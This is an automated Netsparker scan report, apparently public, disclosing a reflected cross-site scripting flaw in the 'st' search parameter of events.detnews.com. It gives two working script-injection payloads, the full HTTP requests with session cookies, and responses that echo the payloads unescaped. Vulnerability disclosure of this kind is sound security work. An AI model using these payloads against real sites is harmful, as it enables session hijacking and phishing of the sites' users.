XSS, Cross Site Scripting in events.detnews.com, CWE-79, CAPEC-86, Report
Netsparker - Scan Report Summary
|
|
Total Requests
24214
Average Speed
17.78
req/sec.
|
9
identified
6
confirmed
0
critical
2
informational
|
SCAN SETTINGS
Scan Settings
|
PROFILE
|
Previous Settings
|
ENABLED ENGINES
|
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
|
|
Authentication
Scheduled
|
VULNERABILITIES
Vulnerabilities
|
|
|
VULNERABILITY SUMMARY
Vulnerability Summary
|
|
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
Classification
Parameters
Parameter
|
Type
|
Value
|
city
|
GET
|
Ann Arbor
|
st
|
GET
|
"></style><script>alert(9)</script>
|
Request
GET /search?city=Ann+Arbor&st=%22%3E%3C/style%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7CzoPc2Vzc2lvbl9pZCIlYjAwN2Y3MzIwNjYyZGNlY2I5YjY2NGM3YTZkYWMyYzUiDmxhc3Rfd2hhdCItPjwvc2NyaXB0PjxzY3JpcHQ%2BbmV0c3BhcmtlciA5IDwvc2NyaXB0PiIIcmlkaQYiC2J1Y2tldEYiDmxhc3Rfd2hlbiIQTmV4dCA3IERheXMiDWxvY2F0aW9uexEiC3JhZGl1c2lQIgljaXR5Ig5XYXRlcmZvcmQiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY5MDc0NDI5OTk5OTk5OQAy%2FyITZGlzcGxheV9zdHJpbmciEldhdGVyZm9yZCwgTUkiDXRpbWV6b25lIhRBbWVyaWNhL0RldHJvaXQiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy04My40MDY2MTMxOTk5OTk5OTUAB80iDGFkZHJlc3MiEXdhdGVyZm9yZC1taSIRd2hlcmVfc3RyaW5nQBYiCnN0YXRlIgdNSQ%3D%3D--447bc94f6cf6acc3ca819abf183edd9409c640c7; welcome=WoUDhFiJsrUv8J4dD8WspA.130339242; zvents_tracker_sid=WoUDhFiJsrUv8J4dD8WspA.130339242
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 14:11:16 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
X-Runtime: 122
ETag: "6fb3841ac66d7bfd019476e6cbeba9ca"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www8
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlYjAwN2Y3MzIwNjYyZGNlY2I5YjY2NGM3YTZkYWMyYzUiCHJpZGkAIg5sYXN0X3doYXQiACIJc2VpZGkGIg5sYXN0X3doZW4iACILYnVja2V0RiINbG9jYXRpb257ESIJY2l0eSIOV2F0ZXJmb3JkIgtyYWRpdXNpLSINbGF0aXR1ZGVmGjQyLjY5MDc0NDI5OTk5OTk5OQAy%2FyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCITZGlzcGxheV9zdHJpbmciEldhdGVyZm9yZCwgTUkiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTgzLjQwNjYxMzE5OTk5OTk5NQAHzSIRd2hlcmVfc3RyaW5nQBsiDGFkZHJlc3MiEXdhdGVyZm9yZC1taSIKc3RhdGUiB01J--ac37a882f02adbe622ed087b01be9fce97c59b4b; path=/; expires=Sat, 14-Apr-2012 14:11:16 GMT; HttpOnly
Content-Encoding:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="y_key" content="9efebc8a7242cef1" /><meta name="ROBOTS" content="NOINDEX,FOLLOW" /><title>Search Results - Detroit News</title> <script type="text/javascript"> var zlogid = "PanSrYq3j3Xqmy_bYBmCdg"; </script><script type="text/javascript" charset="utf-8"> var z_page_type = '\"><\/style><script>netsparker(9)<\/script>'; var z_temp_type = 'searches'; var z_user_location = '48067'; var z_disable_tracking = false; var z_include_quantcast = true;var z_city = 'Ann Arbor';var z_st = '\"><\/style><script>netsparker(9)<\/script>';var z_swhat = '';var z_swhen = '';var z_swhere = '';var z_srad = '40';var z_action = 'index';var z_cobrand = '#<Partner:0x2ad3fec42230>';var z_controller = 'search';</script><meta name="keywords" content="Search results" /><meta name="description" content="Search results" /> <script src="http://js.zvents.com/javascripts/happy_default.js?version=0.673227600632077" type="text/javascript"></script><link href="http://js.zvents.com/stylesheets/happy_default.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><link href='/partners/css/26.css' media='screen' rel='Stylesheet' type='text/css' /><!--[if IE]><link href="http://js.zvents.com/stylesheets/happy_ie.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie7.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if lt IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie6.css?version=0.673227600632077" media="screen" rel="stylesheet" type="text/css" /><![endif]--><link rel="search" href="/opensearch/description26.xml" type="application/opensearchdescription+xml" title="Detroit News Events" /></head><body id="body_"></style><script>netsparker(9)</script>"><div style="display:none"><iframe src="http://www.zvents.com/zat" width="1" height="1"><p>Your browser does not support iframes.</p></iframe></div><script type="text/javascript"> //<![CDATA[ Zvents.tracker.init( {"url":"http://www.zvents.com/zat","params":{"uid":"PanSrYq3j3Xqmy_bYBmCdg","src":"zmp","pt":"search","pid":"26"}} ); //]]></script><div style='display:none'><!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY --><img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" /><!-- End of Segment Pixel --><!-- Segment Pixel for DET --><img src="https://secure.adnxs.com/seg?add=87286&t=2" width="1" height="1" /><!-- End of Segment Pixel --></div><script language="JavaScript" type="text/javascript"> function _hbLink(a,b) {}</script><script language="JavaScript" type="text/javascript"> var s_zv_account="zvprod"</script><!-- SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript" type="text/javascript" src="/javascripts/s_code.js"></script><script language="JavaScript" type="text/javascript"><!--s_zv.prop4="40"s_zv.prop5="1"s_zv.prop48="art_DET"s_zv.prop6="\"><\/style><script>netsparker(9)<\/script>"s_zv.prop49="art_ZEN"s_zv.prop7="0"s_zv.prop8="new"s_zv.prop1=""s_zv.prop10="Waterford, MI"s_zv.prop2=""s_zv.prop3="" s_zv.pageName="\"><\/style><script>netsparker(9)<\/script>:searches:text" s_zv.channel="\"><\/style><script>netsparker(9)<\/script>" s_zv.hier1="\"><\/style><script>netsparker(9)<\/script>,searches" s_zv.prop12="searches" s_zv.prop25="/search?city=Ann+Arbor&st=%22%3E%3C/style%3E%3Cscript%3Enetsparker(9)%3C/script%3E" s_zv.prop29="events.detnews.com" s_zv.prop30="Detroit News" s_zv.prop31="Detroit Media Partnership" s_zv.prop32="26" s_zv.prop28="Detroit Media Partnership:Detroit News:events.detnews.com:26" s_zv.prop41="not logged in" s_zv.prop42="Detroit News|\"><\/style><script>netsparker(9)<\/script>:searches:text" s_zv.server="www8.admin.zvents.com:classic" s_zv.linkInternalFilters="javascript:,events.detnews.com" s_zv.events=s_zv.apl(s_zv.events,"event1",",",2); /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_zv.t();if(s_code)document.write(s_code)//--></script><script language="JavaScript" type="text/javascript"><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.20.3. --><script language="JavaScript" type="text/javascript"> (function($){ $(function(){ $('.sc-event-buytixbig').click(function(){ s_zv.tl(this, 'o', 'EventDetail_BuyTix_GreenButton'); return true; }); $('.sc-event-buytixico').click(function(){ s_zv.tl(this, 'o', 'EventDetail_Recurring_BuyNowIco'); return true; }); $('.sc-venue-reservation').click(function(){ s_zv.tl(this, 'o', 'MakeReservation_GreenButton'); return true; }); $('.sc-serp-reservation').click(function(){ s_zv.tl(this, 'o', 'SERP_HotDining_BuyNow'); return true; }); $('.sc-reminder').click(function(){ this.name = "lid=Reminder_icon&lpos="+s_zv.pageName; s_zv.tl(this, 'o', 'Reminder_icon'); return true; }); }); })($ZJQuery);</script><div id="wrapper"><link href="http://detroitnews.com/includes/css/ody/ody-vendor.min.css" rel="stylesheet" type="text/css">
<link href="http://detroitnews.com/includes/css/ody/ody-local.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="http://detroitnews.com/odygci/p4/ody-styles-min.css"/>
<!-- Load jQuery from Google CDN with local fallback -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="js/libs/jquery-1.6.2.min.js"><\/script>')</script>
<!-- Load jQueryUI from Google CDN -->
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.js"></script>
<script src="http://detroitnews.com/includes/js/detnews-1.0.js"></script>
<script src="http://detroitnews.com/odygel/lib/core/core.js"></script>
!-- Start OAS Ad Code -->
<script type="text/javascript" language="JavaScript">
listpos_IN = "728x90_1,728x90_2,Flex_1,Flex_2,300x250_1,300x250_2,160x600_1,88x31_1,PageCount";
sitepage_IN = " mi-zvents.detnews/events/detail";
</script>
<script type="text/javascript" src="http://www.detnews.com/portables/OAS_functions.js"></script>
<!-- End OAS Ad Code -->
<script type="text/javascript">
var omitHeaderLeaderboardAd_IN = "false";
var omitMicroBarAd_IN = "true";
var omitFooterLeaderboardAd_IN = "false";
var configureHeaderClass_IN = "inside";
var configureFrontHeader_IN = "true";
var configureInsideHeader_IN = "false";
var configureSectionName_IN = "Events Calendar";
var configureSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
var configureChildSectionName_IN = "";
var configureChildSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
</script>
</head>
<body class="ody-skin">
<div class="ody-custom interactive">
<div class="ody-custom-wrapper">
<script type="text/javascript" src="http://detroitnews.com/portables/header.js"></script>
<div class="ody-wrapper grid_18">
<div class="content-container">
<div class="container">
<div class="ody-article article">
<div class="interactive"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#swhat").hint('blur',false); $ZJQuery("#swhen").hint('blur',false); $ZJQuery("#main_neighborhood_link").zModal({load: "/welcome/populate_neighborhoods/", showCloseIcon: true, remote: true, modalHeight: 400}); $ZJQuery(".nav_bar_tab").divlink(); });</script><div id='z_search_and_browse'><div id='z_search_bar'><form action="/search" method="get"><div class="search-control"><label>what</label> <input id="swhat" name="swhat" type="text" value="" /></div><div class="search-control"><label>when</label> <input id="swhen" name="swhen" type="text" value="" /></div><div class="search-control"><label>near</label> <input id="swhere" name="swhere" type="text" value="Waterford, MI" /><br /><span id="near_help">Address, <a href="javascript:void(0)" id="main_neighborhood_link" class="neighborhood_link">Neighborhood</a>, City & State, or ZIP</span></div><div class="search-control"><input id="z_search_button" name="commit" type="submit" value="Search" /><select id="st_select" name="st_select"><option value="any" selected="selected">All Listings</option><option value="event">Events</option><option value="movie">Movies</option><option value="venue">Venues</option><option value="restaurant">Restaurants</option></select></div><input type="hidden" name="search" value="true" /><input type="hidden" name="svt" value="text" /><input type="hidden" name="srss" value="" /><div class="divclear"></div></form></div><div class="nav_bar"><div class="nav_bar_link"><a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?version=0.673227600632077" /> add to our listings</a></div><div class='nav_bar_tab nav_bar_on'><a href="/48067/events" name="&lid=Header_NavBar_"></style><script>netsparker(9)</script>&lpos="></style><script>netsparker(9)</script>_searches">events</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/movies" name="&lid=Header_NavBar_"></style><script>netsparker(9)</script>&lpos="></style><script>netsparker(9)</script>_searches">movies</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/venues" name="&lid=Header_NavBar_"></style><script>netsparker(9)</script>&lpos="></style><script>netsparker(9)</script>_searches">venues</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/restaurants" name="&lid=Header_NavBar_"></style><script>netsparker(9)</script>&lpos="></style><script>netsparker(9)</script>_searches">restaurants</a></div><div class="divclear"></div></div></div><div class="login_tools z_login_tools"><a href="/">Home</a> |<a href="/user/signup?return_to=%2Fsearch%3Fcity%3DAnn%2BArbor%26st%3D%2522%253E%253C%2Fstyle%253E%253Cscript%253Enetsparker%289%29%253C%2Fscript%253E">Register</a> | <a href="/user/login?return_to=%2Fsearch%3Fcity%3DAnn%2BArbor%26st%3D%2522%253E%253C%2Fstyle%253E%253Cscript%253Enetsparker%289%29%253C%2Fscript%253E">Log In</a></div><div id="content"><script type="text/javascript"> Zvents.tracker.notifySearchView( '', '', 'st="></style><script>netsparker(9)</script>&ssi=0&ssrss=5&srss=11');</script><div style="margin-top:3px;"><div id="navigation"><div id="facets"><div class="comp" id="refine_results"><div class="label">Refine Results</div><div class="content"><div class="facets"><div class="facet_title">No search results.</div></div></div></div></div><br /><div class="comp" id="partner_left_rail"><div class="label">Support</div>
<div class="content">
<ul class="ulindent">
<li><a href="/support/contact">Contact Us</a></li>
<li><a href="/support/help">Help / FAQ</a></li>
<li><a href="/support/content_guidelines">Content Guidelines</a></li>
</ul>
</div></div></div><div id="search_content_main"><div id="error_message">Invalid search: "></style><script>netsparker(9)</script> is not a valid search category.</div><div id="search_wrapper"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#within_form").submit(function(){ parent.location = '/search?city=Ann+Arbor&st=%22%3E%3C%2Fstyle%3E%3Cscript%3Enetsparker%289%29%3C%2Fscript%3E&swhat=&swhen=&swhere=' + '&srad=' + $ZJQuery('#srad2')[0].value; return false; }); $ZJQuery("#srad2").blur(function(){ parent.location = '/search?city=Ann+Arbor&st=%22%3E%3C%2Fstyle%3E%3Cscript%3Enetsparker%289%29%3C%2Fscript%3E&swhat=&swhen=&swhere=' + '&srad=' + $ZJQuery('#srad2')[0].value; }); });</script><div class="resultinfo"> within<form name="within_form" id="within_form"><input type="text" name="srad2" id="srad2" value="40" size="3"></form> miles</div><div class="no_results"><h3 style="margin-top:0px">We don't have anything for "<span></span>" in our &quot;&gt;&lt;/style&gt;&lt;script&gt;netsparker(9)&lt;/script&gt; search.</h3><h3 class="sub_heading">Give it another go!</h3><p>Be as general as the "jazz" music you appreciate or as specific as that "USC / Cal Football" game for which you need tickets. Enter a search for what you want to do or simply what you enjoy. </p><h3 class="sub_heading">Expand Your Search</h3><a href="/search?city=Ann+Arbor..
Parameters
Parameter
|
Type
|
Value
|
acat
|
GET
|
3
|
cat
|
GET
|
3
|
new
|
GET
|
n
|
search
|
GET
|
true
|
srad
|
GET
|
40
|
srss
|
GET
|
50
|
ssi
|
GET
|
0
|
ssrss
|
GET
|
5
|
st
|
GET
|
'><iMg src=N onerror=alert(9)>
|
svt
|
GET
|
text
|
swhat
|
GET
|
family
|
swhen
|
GET
|
3
|
trim
|
GET
|
1
|
sort
|
GET
|
1
|
Request
GET /search?acat=3&cat=3&new=n&search=true&srad=40&srss=50&ssi=0&ssrss=5&st='%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&svt=text&swhat=family&swhen=3&trim=1&sort=1 HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate,gzip, deflate
Host: events.detnews.com
Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlMzQ5NDlmNTRjNjQ1OGQ1NGRjYzc1OWZkMzQwYTI0N2YiCXNlaWRpByIIcmlkaQAiDmxhc3Rfd2hhdCIsLyAgc3RZbGU9IHggZXhwcmUvICAvc3Npb24gbmV0c3BhcmtlciA5Ig5sYXN0X3doZW4iBjMiC2J1Y2tldEYiDWxhc3RfcnNzIgc1MCINbG9jYXRpb257ESIJY2l0eSIYUG9ydCBIdXJvbiBUb3duc2hpcCILcmFkaXVzaS0iDWxhdGl0dWRlZhI0Mi45NzY2MTQyAOeUIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIg10aW1lem9uZSIUQW1lcmljYS9EZXRyb2l0IhNkaXNwbGF5X3N0cmluZyIcUG9ydCBIdXJvbiBUb3duc2hpcCwgTUkiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTgyLjQ4NjEwNTMwMDAwMDAwNgB6YyIRd2hlcmVfc3RyaW5nQB0iDGFkZHJlc3MiG3BvcnQtaHVyb24tdG93bnNoaXAtbWkiCnN0YXRlIgdNSQ%3D%3D--8eff39315917e44102272ff24a2f2d42bebeb4f6; welcome=bfi54I2inY-9f2MM19CNcg.130339426; zvents_tracker_sid=bfi54I2inY-9f2MM19CNcg.130339426
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 14:15:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
X-Runtime: 133
ETag: "82d54e8e5980befc134dd552cbc54f54"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www24
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlMzQ5NDlmNTRjNjQ1OGQ1NGRjYzc1OWZkMzQwYTI0N2YiDmxhc3Rfd2hhdCILZmFtaWx5IghyaWRpBiIJc2VpZGkHIgtidWNrZXRGIg5sYXN0X3doZW4iBjMiDWxhc3RfcnNzIgc1MCINbG9jYXRpb257ESILcmFkaXVzaS0iCWNpdHkiGFBvcnQgSHVyb24gVG93bnNoaXAiCmVycm9yRiINbGF0aXR1ZGVmEjQyLjk3NjYxNDIA55QiE2Rpc3BsYXlfc3RyaW5nIhxQb3J0IEh1cm9uIFRvd25zaGlwLCBNSSINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTgyLjQ4NjEwNTMwMDAwMDAwNgB6YyIMYWRkcmVzcyIbcG9ydC1odXJvbi10b3duc2hpcC1taSIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdNSQ%3D%3D--21b89f58d74fbf6effea3c8335bcd2487568bb2a; path=/; expires=Sat, 14-Apr-2012 14:15:21 GMT; HttpOnly
Content-Encoding:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="y_key" content="9efebc8a7242cef1" /><meta name="ROBOTS" content="NOINDEX,FOLLOW" /><title>Search Results - Business &amp; Tech - Detroit News</title> <script type="text/javascript"> var zlogid = "Af5dCaCfn1eZy0XlYbvwqQ"; </script><script type="text/javascript" charset="utf-8"> var z_page_type = '><iMg src=N onerror=netsparker(9)>'; var z_temp_type = 'searches'; var z_user_location = '48067'; var z_disable_tracking = false; var z_include_quantcast = true;var z_cat = '3';var z_new = 'n';var z_ssrss = '5';var z_search = 'true';var z_st = '><iMg src=N onerror=netsparker(9)>';var z_swhat = 'family';var z_srad = '40';var z_swhen = '3';var z_trim = '1';var z_swhere = '';var z_acat = '3';var z_action = 'index';var z_cobrand = '#<Partner:0x2b8556f11718>';var z_svt = 'text';var z_controller = 'search';var z_sort = '1';var z_srss = '50';var z_ssi = '0';</script><meta name="keywords" content="Search results" /><meta name="description" content="Search results" /> <script src="http://js.zvents.com/javascripts/happy_default.js?version=0.451530329483086" type="text/javascript"></script><link href="http://js.zvents.com/stylesheets/happy_default.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><link href='/partners/css/26.css' media='screen' rel='Stylesheet' type='text/css' /><!--[if IE]><link href="http://js.zvents.com/stylesheets/happy_ie.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie7.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if lt IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie6.css?version=0.451530329483086" media="screen" rel="stylesheet" type="text/css" /><![endif]--><link rel="search" href="/opensearch/description26.xml" type="application/opensearchdescription+xml" title="Detroit News Events" /></head><body id="body_'><iMg src=N onerror=netsparker(9)>"><div style="display:none"><iframe src="http://www.zvents.com/zat" width="1" height="1"><p>Your browser does not support iframes.</p></iframe></div><script type="text/javascript"> //<![CDATA[ Zvents.tracker.init( {"url":"http://www.zvents.com/zat","params":{"uid":"Af5dCaCfn1eZy0XlYbvwqQ","src":"zmp","pt":"search","pid":"26"}} ); //]]></script><div style='display:none'><!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY --><img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" /><!-- End of Segment Pixel --><!-- Segment Pixel for DET --><img src="https://secure.adnxs.com/seg?add=87286&t=2" width="1" height="1" /><!-- End of Segment Pixel --></div><script language="JavaScript" type="text/javascript"> function _hbLink(a,b) {}</script><script language="JavaScript" type="text/javascript"> var s_zv_account="zvprod"</script><!-- SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript" type="text/javascript" src="/javascripts/s_code.js"></script><script language="JavaScript" type="text/javascript"><!--s_zv.prop4="40"s_zv.prop5="1"s_zv.prop48="art_DET"s_zv.prop6="><iMg src=N onerror=netsparker(9)>"s_zv.prop49="art_ZEN"s_zv.prop7="0"s_zv.prop8="existing"s_zv.prop1="family"s_zv.prop10="Port Huron Township, MI"s_zv.prop2=""s_zv.prop3="3" s_zv.pageName="><iMg src=N onerror=netsparker(9)>:searches:text" s_zv.channel="><iMg src=N onerror=netsparker(9)>" s_zv.hier1="><iMg src=N onerror=netsparker(9)>,searches" s_zv.prop12="searches" s_zv.prop25="/search?acat=3&cat=3&new=n&search=true&srad=40&srss=50&ssi=0&ssrss=5&st=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&svt=text&swhat=family&swhen=3&trim=1&sort=1" s_zv.prop29="events.detnews.com" s_zv.prop30="Detroit News" s_zv.prop31="Detroit Media Partnership" s_zv.prop32="26" s_zv.prop28="Detroit Media Partnership:Detroit News:events.detnews.com:26" s_zv.prop41="not logged in" s_zv.prop42="Detroit News|><iMg src=N onerror=netsparker(9)>:searches:text" s_zv.server="www24.admin.zvents.com:classic" s_zv.linkInternalFilters="javascript:,events.detnews.com" s_zv.events=s_zv.apl(s_zv.events,"event1",",",2); /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_zv.t();if(s_code)document.write(s_code)//--></script><script language="JavaScript" type="text/javascript"><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.20.3. --><script language="JavaScript" type="text/javascript"> (function($){ $(function(){ $('.sc-event-buytixbig').click(function(){ s_zv.tl(this, 'o', 'EventDetail_BuyTix_GreenButton'); return true; }); $('.sc-event-buytixico').click(function(){ s_zv.tl(this, 'o', 'EventDetail_Recurring_BuyNowIco'); return true; }); $('.sc-venue-reservation').click(function(){ s_zv.tl(this, 'o', 'MakeReservation_GreenButton'); return true; }); $('.sc-serp-reservation').click(function(){ s_zv.tl(this, 'o', 'SERP_HotDining_BuyNow'); return true; }); $('.sc-reminder').click(function(){ this.name = "lid=Reminder_icon&lpos="+s_zv.pageName; s_zv.tl(this, 'o', 'Reminder_icon'); return true; }); }); })($ZJQuery);</script><div id="wrapper"><link href="http://detroitnews.com/includes/css/ody/ody-vendor.min.css" rel="stylesheet" type="text/css">
<link href="http://detroitnews.com/includes/css/ody/ody-local.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="http://detroitnews.com/odygci/p4/ody-styles-min.css"/>
<!-- Load jQuery from Google CDN with local fallback -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="js/libs/jquery-1.6.2.min.js"><\/script>')</script>
<!-- Load jQueryUI from Google CDN -->
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.js"></script>
<script src="http://detroitnews.com/includes/js/detnews-1.0.js"></script>
<script src="http://detroitnews.com/odygel/lib/core/core.js"></script>
!-- Start OAS Ad Code -->
<script type="text/javascript" language="JavaScript">
listpos_IN = "728x90_1,728x90_2,Flex_1,Flex_2,300x250_1,300x250_2,160x600_1,88x31_1,PageCount";
sitepage_IN = " mi-zvents.detnews/events/detail";
</script>
<script type="text/javascript" src="http://www.detnews.com/portables/OAS_functions.js"></script>
<!-- End OAS Ad Code -->
<script type="text/javascript">
var omitHeaderLeaderboardAd_IN = "false";
var omitMicroBarAd_IN = "true";
var omitFooterLeaderboardAd_IN = "false";
var configureHeaderClass_IN = "inside";
var configureFrontHeader_IN = "true";
var configureInsideHeader_IN = "false";
var configureSectionName_IN = "Events Calendar";
var configureSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
var configureChildSectionName_IN = "";
var configureChildSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
</script>
</head>
<body class="ody-skin">
<div class="ody-custom interactive">
<div class="ody-custom-wrapper">
<script type="text/javascript" src="http://detroitnews.com/portables/header.js"></script>
<div class="ody-wrapper grid_18">
<div class="content-container">
<div class="container">
<div class="ody-article article">
<div class="interactive"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#swhat").hint('blur',false); $ZJQuery("#swhen").hint('blur',false); $ZJQuery("#main_neighborhood_link").zModal({load: "/welcome/populate_neighborhoods/", showCloseIcon: true, remote: true, modalHeight: 400}); $ZJQuery(".nav_bar_tab").divlink(); });</script><div id='z_search_and_browse'><div id='z_search_bar'><form action="/search" method="get"><div class="search-control"><label>what</label> <input id="swhat" name="swhat" type="text" value="family" /></div><div class="search-control"><label>when</label> <input id="swhen" name="swhen" type="text" value="3" /></div><div class="search-control"><label>near</label> <input id="swhere" name="swhere" type="text" value="Port Huron Township, MI" /><br /><span id="near_help">Address, <a href="javascript:void(0)" id="main_neighborhood_link" 